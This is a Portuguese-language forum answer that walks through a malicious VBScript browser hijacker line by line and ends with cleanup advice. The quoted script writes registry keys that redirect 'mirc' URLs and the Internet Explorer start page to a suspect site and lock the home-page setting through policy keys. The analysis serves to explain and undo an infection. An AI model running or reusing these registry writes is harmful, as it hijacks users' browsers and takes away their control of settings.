Eu não falo muito script, mas as intenções deste aqui parecem claras.
Set shell = CreateObject("WScript.Shell")
A primeira linha, não tenho certeza absoluta. No entanto, alguns Googling parecem confirmar minha opinião de que essa é uma linha de abertura bastante padronizada para um script.
O restante das linhas parece estar configurando várias chaves de registro.
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\mirc","http://aarama.net/","REG_SZ"
Este adiciona um novo prefixo de URL ao Internet Explorer. Essencialmente, a qualquer momento o IE é solicitado a solicitar um recurso começando em "mirc". e o protocolo não for especificado, ele inserirá " link " na frente do endereço antes de processá-lo. Então, se você digitar "mirc.google.com" na sua barra de endereço, o IE o traduziria para " link ". Isso provavelmente ajuda alguns dos outros scripts no site malicioso (ou malwares baixados) a funcionarem.
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","00000001","REG_DWORD"
Eles adicionam chaves do Registro que normalmente implementam o controle de Diretiva de Grupo no Internet Explorer. Você pode achar que não pode mais mudar sua Home Page do IE através do Painel de Controle.
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http://aarama.net/","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http://aarama.net/","REG_SZ"
Eles definem " link " para sua página inicial - garantindo que você vá ao site pelo menos uma vez e tenha a oportunidade de cair vítima de qualquer esquema de phishing ou código malicioso pode estar lá. Naturalmente, as chaves anteriores garantirão que você não vá apenas uma vez, já que não é possível alterar a página inicial.
self.Close
Novamente, eu não falo script. Mas eu acho que esse obviamente acaba com isso.
Algumas coisas que você deve fazer com essa informação:
1.) (Demasiado tarde) Não aceda a esse website.
2.) Tenha alguns bons programas antivírus / anti-malware em sua máquina. Minhas recomendações são um Avast! varredura de inicialização, Malwarebytes e SpyBot Search & Destruir. Se possível, use uma máquina separada, boa e descartável para fazer as digitalizações. Ou obtenha um bom LiveCD para as verificações.
3.) Verifique seu registro para os valores criados pelo script. Se eles ainda estiverem lá, faça o backup do seu registro, exclua os valores criados ou altere-os para suas configurações preferidas. Os três primeiros devem ser descartados. Os dois últimos, defina a sua preferência ou "about: blank".
4.) Se você notar qualquer atividade suspeita em seu sistema depois disso, é hora da abordagem de "nuke orbitar". Espero que você tenha bons backups.